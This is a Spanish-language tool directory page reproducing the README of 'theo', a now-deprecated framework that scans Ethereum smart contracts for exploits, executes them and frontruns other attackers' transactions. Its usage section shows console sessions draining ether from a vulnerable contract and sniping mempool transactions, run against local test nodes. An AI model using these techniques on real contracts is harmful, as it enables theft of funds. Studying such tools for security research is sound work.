Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
theo — Herramienta de reconocimiento y explotación de Ethereum. | Kitploit
Herramientas/GitHubGitHub/cleanunicorn/theo
Frameworks de Pruebas de PenetraciónReconocimientoFrameworks de ExploitsAnálisis de Vulnerabilidades
GitHubcleanunicorn/theo

theo

Herramienta de reconocimiento y explotación de Ethereum.

Ver Repositorio
3489323hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
# Theo

**Obsoleto, ya no se mantiene, no lo instales, no lo uses, ¡estás advertido!**

![License](https://img.shields.io/github/license/cleanunicorn/theo.svg)
[![CircleCI](https://circleci.com/gh/cleanunicorn/theo/tree/master.svg?style=shield)](https://circleci.com/gh/cleanunicorn/theo)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/71da66211eff42f298062a883b7fa5e9)](https://www.codacy.com/app/lucadanielcostin/theo)
[![PyPI](https://img.shields.io/pypi/v/theo.svg)](https://pypi.org/project/theo/)
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/ambv/black)

Theo pretende ser un framework de explotación y una herramienta de reconocimiento e interacción con blockchain.

Características:

- Escaneo automático de contratos inteligentes que genera una lista de posibles exploits.
- Envío de transacciones para explotar un contrato inteligente.
- Monitor del pool de transacciones.
- Consola Web3.
- Ejecución anticipada y posterior de transacciones (frontrunning y backrunning).
- Esperar una lista de transacciones y enviar otras.
- Estimar el gas de las transacciones para que solo se envíen las exitosas.
- Deshabilitar la estimación de gas enviará transacciones con una cantidad fija de gas.

<!--![Theo](https://assets.kitploit.com/production/public/readmes/2725/57e3422ec586b5648c0ff8219907aee50a2a6427e3011a2e96fb86b2aabf84a3.png)-->

Conoce a [Karl](https://github.com/cleanunicorn/karl) del trabajo.

El propósito de Theo es luchar contra los script kiddies que intentan ser hackers leet. Puede escucharlos mientras intentan explotar sus honeypots y hacer que pierdan sus fondos, para su propio beneficio.

> "No me trajiste por mi personalidad encantadora."

## Instalación

Theo está disponible como paquete de PyPI:

```console
$ pip install theo
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
            [--account-pk ACCOUNT_PK] [--contract ADDRESS]
            [--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version]

Monitor contracts for balance changes or tx pool.

optional arguments:
  -h, --help            show this help message and exit
  --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:
                        http://127.0.0.1:8545)
  --account-pk ACCOUNT_PK
                        The account's private key (default: None)
  --contract ADDRESS    Contract to monitor (default: None)
  --skip-mythril SKIP_MYTHRIL
                        Don't try to find exploits with Mythril (default:
                        False)
  --load-file LOAD_FILE
                        Load exploit from file (default: )
  --version             show program's version number and exit

RPC connections:
  --rpc-ws RPC_WS       Connect to this WebSockets RPC (default: None)
  --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)
```

Instalar desde fuentes:

```console
$ git clone https://github.com/cleanunicorn/theo
$ cd theo
$ virtualenv ./venv
$ . ./venv/bin/activate
$ pip install -r requirements.txt
$ pip install -e .
$ theo --help
```

Requisitos:

- Python 3.5 o superior.
- Un nodo Ethereum con RPC disponible. [Ganache](https://github.com/trufflesuite/ganache-cli) funciona muy bien para pruebas o para validar exploits.

## Demos

### Encontrar exploit y ejecutarlo

Escanea un contrato inteligente, encuentra exploits, explota:

- Iniciar Ganache como nuestro nodo Ethereum local.
- Desplegar el contrato vulnerable (ocurre en otra ventana).
- Escanear en busca de exploits.
- Ejecutar el exploit.

[![asciicast](https://asciinema.org/a/CgTH8tIAoGsgEYsd7XN65tJSp.svg)](https://asciinema.org/a/CgTH8tIAoGsgEYsd7XN65tJSp?speed=2)

### Ejecución anticipada de víctima

Configurar un honeypot, desplegarlo, esperar al atacante, ejecución anticipada:

- Iniciar geth como nodo Ethereum local.
- Iniciar minería.
- Desplegar el honeypot.
- Iniciar Theo y escanear el mem pool en busca de transacciones.
- Ejecución anticipada del atacante y robar su ether.

[![asciicast](https://asciinema.org/a/n2HnSJvgopf8AKCoSfEJVgvxU.svg)](https://asciinema.org/a/n2HnSJvgopf8AKCoSfEJVgvxU?speed=2)

## Uso

### Pantalla de ayuda

Es buena idea revisar primero la pantalla de ayuda.

```console
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
            [--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril]
            [--load-file LOAD_FILE] [--version]

Monitor contracts for balance changes or tx pool.

optional arguments:
  -h, --help            show this help message and exit
  --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:
                        http://127.0.0.1:8545)
  --account-pk ACCOUNT_PK
                        The account's private key (default: None)
  --contract ADDRESS    Contract to interact with (default: None)
  --skip-mythril        Skip scanning the contract with Mythril (default:
                        False)
  --load-file LOAD_FILE
                        Load exploit from file (default: )
  --version             show program's version number and exit

RPC connections:
  --rpc-ws RPC_WS       Connect to this WebSockets RPC (default: None)
  --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)
```

### Ejecución simbólica

Se identifica automáticamente una lista de exploits usando [mythril](https://github.com/ConsenSys/mythril).

Inicia una sesión ejecutando:

```console
$ theo --contract=<scanned contract> --account-pk=<your private key>
Scanning for exploits in contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe
Connecting to HTTP: http://127.0.0.1:8545.
Found exploits(s):
 [Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])]

A few objects are available in the console:
- `exploits` is an array of loaded exploits found by Mythril or read from a file
- `w3` an initialized instance of web3py for the provided HTTP RPC endpoint

Check the readme for more info:
https://github.com/cleanunicorn/theo

>>> 
```

Analizará el contrato y encontrará una lista de exploits disponibles.

Puedes ver los exploits disponibles encontrados. En este caso se encontró un exploit. Cada exploit es un objeto [Exploit](https://github.com/cleanunicorn/theo/blob/master/theo/exploit/exploit.py).

```console
>>> exploits[0]
Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])
```

### Ejecutar exploits

Los pasos del exploit se pueden ejecutar llamando a `.execute()` en el objeto exploit. Las transacciones se firmarán y enviarán al nodo al que estás conectado.

```console
>>> exploits[0].execute()
2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47} 
2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to be mined... 
2019-07-22 11:26:16,337 - Mined 
2019-07-22 11:26:16,341 - Initial balance:      1155999450759997797167 (1156.00 ether) 
2019-07-22 11:26:16,342 - Final balance:        1156999450759997768901 (1157.00 ether) 
```

### Ejecución anticipada

Puedes iniciar el monitor de ejecución anticipada para escuchar a otros hackers que intentan explotar el honeypot.

Usa `.frontrun()` para comenzar a escuchar el exploit y, cuando se encuentre, enviar una transacción con un precio de gas más alto.

```console
>>> exploits[0].frontrun()
2019-07-22 11:22:26,285 - Scanning the mem pool for transactions... 
2019-07-22 11:22:45,369 - Found tx: 0xf6041abe6e547cea93e80a451fdf53e6bdae67820244246fde44098f91ce1c20 
2019-07-22 11:22:45,375 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': '0x2', 'data': '0xcf7a8965', 'gas': 30522, 'value': 1000000000000000000, 'nonce': 45} 
2019-07-22 11:22:45,380 - Waiting for 0xa73316daf806e7eef83d09e467c32ce5faa239c6eda3a270a8ce7a7aae48fb7e to be mined... 
2019-07-22 11:22:56,852 - Mined 
```

> "¡Oh, Dios mío! ¡El quarterback está tostado!"

Esto funciona muy bien para algunos [contratos](https://github.com/cleanunicorn/theo/blob/master/contracts) especialmente diseñados u otros contratos vulnerables, siempre y cuando te asegures de que la ejecución anticipada juegue a tu favor.

### Cargar transacciones desde archivo

En lugar de identificar los exploits con mythril, puedes especificar la lista de exploits tú mismo.

Crea un archivo con este formato [exploits.json](https://github.com/cleanunicorn/theo/blob/master/test/input-tx.json):

```json
[
    [
        {
            "name": "claimOwnership()",
            "input": "0x4e71e0c8",
            "value": "0xde0b6b3a7640000"
        },
        {
            "name": "retrieve()",
            "input": "0x2e64cec1",
            "value": "0x0"
        }
    ],
    [
        {
            "name": "claimOwnership()",
            "input": "0x4e71e0c8",
            "value": "0xde0b6b3a7640000"
        }
    ]
]
```

Este define 2 exploits, el primero tiene 2 transacciones y el segundo solo 1.

Puedes cargarlo con:

```console
$ theo --load-file=./exploits.json
```

# Solución de problemas

## openssl/aes.h: No such file or directory

Si obtienes este error, necesitas las bibliotecas fuente de libssl:

```
    scrypt-1.2.1/libcperciva/crypto/crypto_aes.c:6:10: fatal error: openssl/aes.h: No such file or directory
     #include <openssl/aes.h>
              ^~~~~~~~~~~~~~~
    compilation terminated.
    error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
    
    ----------------------------------------
Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-5rl4ep94/scrypt/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-mnbzx9qe-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-5rl4ep94/scrypt/
```

En Ubuntu puedes instalarlas con:

```console
$ sudo apt install libssl-dev
```
Descargar herramienta